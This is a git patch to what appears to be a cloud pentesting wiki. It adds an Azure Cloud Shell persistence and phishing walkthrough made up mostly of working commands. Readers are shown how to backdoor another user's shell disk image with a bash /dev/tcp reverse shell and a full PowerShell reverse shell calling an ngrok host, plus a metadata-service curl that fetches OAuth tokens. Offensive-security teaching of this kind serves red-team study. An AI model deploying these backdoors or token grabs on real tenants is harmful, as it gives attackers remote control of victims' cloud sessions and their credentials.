From def87f1ffb242c249ed20b85b1594e5747d161cb Mon Sep 17 00:00:00 2001
From: Carlos Polop <carlospolop@gmail.com>
Date: Sat, 22 Feb 2025 00:32:09 +0100
Subject: [PATCH] asd

---
 .github/workflows/translate_af.yml            |  4 +-
 .../az-cloud-shell-persistence.md             | 40 ++++++++++++++++-
 .../az-services/az-cloud-shell.md             | 44 ++++++++++---------
 .../az-container-instances-apps-jobs.md       |  1 +
 4 files changed, 65 insertions(+), 24 deletions(-)

diff --git a/.github/workflows/translate_af.yml b/.github/workflows/translate_af.yml
index c72dc7d71..8d3b3856d 100644
--- a/.github/workflows/translate_af.yml
+++ b/.github/workflows/translate_af.yml
@@ -68,13 +68,13 @@ jobs:
 
       - name: Update searchindex.js in repo
         run: |
-          git checkout $BRANCH
+          (git checkout $BRANCH
           git pull
           cp book/searchindex.js searchindex.js
           cp book/searchindex.json searchindex.json
           git add searchindex.js searchindex.json
           git commit -m "Update searchindex for $BRANCH"
-          git push
+          git push) || echo "No changes to searchindex.js"
       
       # Login in AWs
       - name: Configure AWS credentials using OIDC
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
index e6fa7ee27..335edc4f7 100644
--- a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -7,7 +7,7 @@
 Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
 
 * **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
-* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+* **Startup Scripts**: Files like `.bashrc` or `config/PowerShell/Microsoft.PowerShell_profile.ps1` execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
 
 Example backdoor in .bashrc:
 
@@ -22,6 +22,44 @@ Additionally query Azure’s metadata service for instance details and tokens:
 curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
 ```
 
+### Cloud Shell Phishing
+
+If an attacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
+
+- **Download, backdoor and uplaod the image:**
+
+```bash
+# Download image
+mkdir /tmp/phishing_img
+az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>
+
+# Mount the image
+mkdir /tmp/backdoor_img
+sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
+cd /tmp/backdoor_img
+
+# Create backdoor
+mkdir .config
+mkdir .config/PowerShell
+touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
+chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
+
+# Bash backdoor
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
+
+# PS backdoor
+echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
+
+# Unmount
+cd /tmp
+sudo umount /tmp/backdoor_img
+
+# Upload image
+az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
+```
+
+- **Then, phish the user to access https://shell.azure.com/**
+
 
 {{#include ../../../banners/hacktricks-training.md}}
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
index 9977fa6d0..1f80bf729 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
@@ -19,36 +19,38 @@ There aren't permissions assigned to this service, therefore the aren't privileg
 
 ### Cloud Shell Phishing
 
-If anattacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
+If an attacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
 
 - **Download, backdoor and uplaod the image:**
 
 ```bash
 # Download image
 mkdir /tmp/phishing_img
-az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>
+az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>
 
-# Mount image
-cd /tmp/phishing_img/.cloudconsole
-mkdir /tmp/cloudpoison
-sudo mount acc_username.img /tmp/cloudpoison
-cd /tmp/cloudpoison
-sudo mkdir .config
-sudo mkdir .config/PowerShell
-sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
-sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
+# Mount the image
+mkdir /tmp/backdoor_img
+sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
+cd /tmp/backdoor_img
+
+# Create backdoor
+mkdir .config
+mkdir .config/PowerShell
+touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
+chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
 
 # Bash backdoor
 echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
 
 # PS backdoor
-echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
-cd /tmp
+echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
 
-sudo umount /tmp/cloudpoison
+# Unmount
+cd /tmp
+sudo umount /tmp/backdoor_img
 
 # Upload image
-az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"
+az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>
 ```
 
 - **Then, phish the user to access https://shell.azure.com/**
@@ -110,6 +112,11 @@ Policy to forbid the creation of automatic storage accounts for cloud shell stor
 }
 ```
 
+## Persistence
+
+{{#ref}}
+../az-persistence/az-cloud-shell-persistence.md
+{{#endref}}
 
 
 ## References
@@ -117,13 +124,8 @@ Policy to forbid the creation of automatic storage accounts for cloud shell stor
 - [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
 - [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
 - [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
+- [https://www.azadvertizer.net/azpolicyadvertizer/dab3c67a-5f00-47ec-bba6-cc6984c33ae0.html](https://www.azadvertizer.net/azpolicyadvertizer/dab3c67a-5f00-47ec-bba6-cc6984c33ae0.html)
 
 
-## Persistence
-
-{{#ref}}
-../az-persistence/az-cloud-shell-persistence.md
-{{#endref}}
-
 {{#include ../../../banners/hacktricks-training.md}}
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
index 81dba7519..b8f78a9dd 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
@@ -118,3 +118,4 @@ az containerapp job start --name <job-name> --resource-group <res-group>
 
 {{#include ../../../banners/hacktricks-training.md}}
 
+